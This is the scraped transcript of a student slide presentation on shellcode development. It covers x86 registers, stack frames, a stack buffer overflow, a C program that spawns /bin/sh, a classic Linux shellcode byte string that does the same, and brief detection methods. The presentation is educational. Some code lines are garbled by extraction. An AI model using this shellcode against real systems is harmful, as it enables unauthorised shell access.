Download Shellcode Development

Survey
yes no Was this document useful for you?
   Thank you for your participation!

* Your assessment is very important for improving the work of artificial intelligence, which forms the content of this project

page
1
page
2
page
3
page
4
page
5
page
6
page
7
page
8
page
9
page
10
page
11
page
12
page
13
page
14
page
15
page
16
page
17
Document related concepts
no text concepts found
Transcript 
Shellcode
Development
-Femi Oloyede
-Pallavi Murudkar
Agenda
Introduction
 What can Shellcode do?
 Tools for Shellcode Development
 Understanding Shellcode
 Developing Shellcode
 Methods of Detecting Shellcode

Introduction
Shellcode is defined as a set of
instructions injected and then
executed by an exploited program
 Shellcodes are primarily used to
exploit buffer overflows
 The most important task when
creating shellcode is to make it small
and executable

What can Shellcode do?

Providing access to the attacked
system

Spawning /bin/sh [or] cmd.exe (local
shell)

Binding a shell to a port (remote shell)

Adding root/admin user to the system
Tools for Shellcode
development

Nasm Used to write assembly code

Gdb GNU debugger to analyze core dump files

Objdump To disassemble file

Ktrace Trace all system calls a process is using
Next ( Femi )

Understanding Shellcode

Developing Shellcode

Methods of Detecting Shellcode
Understanding Shellcode

IA-32 Machine Architecture (instruction set &
registers)

Program Flow dynamics - Processes Memory
Organization and context switching during functioncalls and interrupt processing.

Shellcode is injected via the modification of the
return address of a function by way of a stack-based
buffer overflow.
Machine Architecture

Refer to IA-32 Intel® Architecture Software Developer's Manual Volume 1: Basic
Architecture”

A large amount of computer software supports the platform, including operating
systems such as MS-DOS, Windows, Linux, BSD, Solaris, and Mac OS X.
EBP
Base pointer. Primarily used to hold the address of the current stack frame. Also sometimes
used as a general data or address register.
ESI
General register or "source index" for string operations. Also has a one-byte LODS[size]
instruction for loading data from memory to the accumulator.
EDI
General register or "destination index" for string operations. Also has a one-byte
STOS[size] instruction to write data out of the accumulator.
ESP
Stack pointer. Is used to hold the top address of the stack.
EIP
Instruction pointer. Holds the current instruction address.
Program Flow Dynamics
Lower memory address
C code
Assembly Code
void A(int a, int b, int c)
{
char buffer1[5];
char buffer2[10];
}
pushl $3
pushl $2
pushl $1
call function
Text Area
Initialized and Uninitialized
Data Area
Stack
Higher memory address
void main()
{
A (1, 2, 3);
return 0;
}
pushl %ebp
movl %esp,%ebp
subl $20,%esp
Program Flow Dynamics
(cont)
EIP (Instruction Pointer)
Address of last instruction in A
Address of previous frame pointer [push %ebp]
Address of ‘return 0’ instruction of
main
ESP (Stack Pointer) [sub1 $20, %esp]
Top of
Stack
Buffer2
Buffer1
SFP
RET
a
b
c
12
8
4
4
byte
s
4
4
4
EBP (Base or frame Pointer) [mov1 $esp, %ebp]
Bottom
of Stack
Stack Based Buffer Overflow
void A(char charPtr *str)
{
char buffer[4];
strcpy(buffer,str);
}
void main()
{
char BigggerString[12] = “AAAAAAAAAAAA”;
A(Biggerstring);
}
Top of Stack
Buffer1 (4)
SFP (4)
RET (4)
AAAA
AAAA
AAAA
Stack Buffer Overflow
charPtr
Bottom of
Stack
Developing Shellcode


Finding the Vulnerability
Writing the Shellcode



Shellcode is sequence of machine instructions or
opcode.
To take advantage of the injected code and to gain
access to the target system, system calls must be
used
On Linux there are two ways of implementing a
system call, they are icall87/icall27 gates and ‘INT
0x80’ software interrupts
Example – Spawning a Shell





Write C code
Extract the assembly code
Extract the opcode
Append an function exit
opcodes to allow the
function exit gracefully
Initialize a buffer with the
opcode.
#include <stdio.h>
void main()
{
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
Example – Spawning a Shell
cont’
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main()
{
int *retPtr;
retPtr = (int *)&ret + 2;
(*retPtr) = (int) shellcode;
}
Top of
Stack
retPtr (4)
Address of
this + 2
words
SFP (4)
RET (4)
Address
of
shellcode
Buffer
bu
…
Bottom
of Stack
Methods for Detecting
Shellcode

NIDS (Network Intrusion Detection System) can be used to
identify shellcode on the wire using Signature databases and
Protocol analysis methods

IPS (Intrusion Prevention System) identifies shellcode by
running the code on a sandbox/virtualization in order to
detect if the given code is malicious or not
Conclusion

Shellcode is a powerful mechanism for the exploitation of
software vulnerabilities.

It is important that the shellcode developed is small in size

Shellcode can be employed to automate software security tests,
where the shellcode is written to expose and draw attention to
security holes
Questions?
Related documents
Hello ASM World: A Painless and Contextual Introduction to x86
Hello ASM World: A Painless and Contextual Introduction to x86
Problem Set #1: Basic Data Structures
Problem Set #1: Basic Data Structures
CIS3360: Security in Computing (online session, Spring 2012)
CIS3360: Security in Computing (online session, Spring 2012)
Lecture 16 Handout
Lecture 16 Handout
Data Structures I Lab (3)
Data Structures I Lab (3)
TTCN-3 Based Automation Framework for LTE UE Protocol Stack
TTCN-3 Based Automation Framework for LTE UE Protocol Stack
Solution - Michael J. Geiger, Ph.D.
Solution - Michael J. Geiger, Ph.D.
COMP 521 F10 Final Exam Review
COMP 521 F10 Final Exam Review
Yield Dave Eckhardt 1
Yield Dave Eckhardt 1
Exercises - Stanford University
Exercises - Stanford University
Sequential search revisited
Sequential search revisited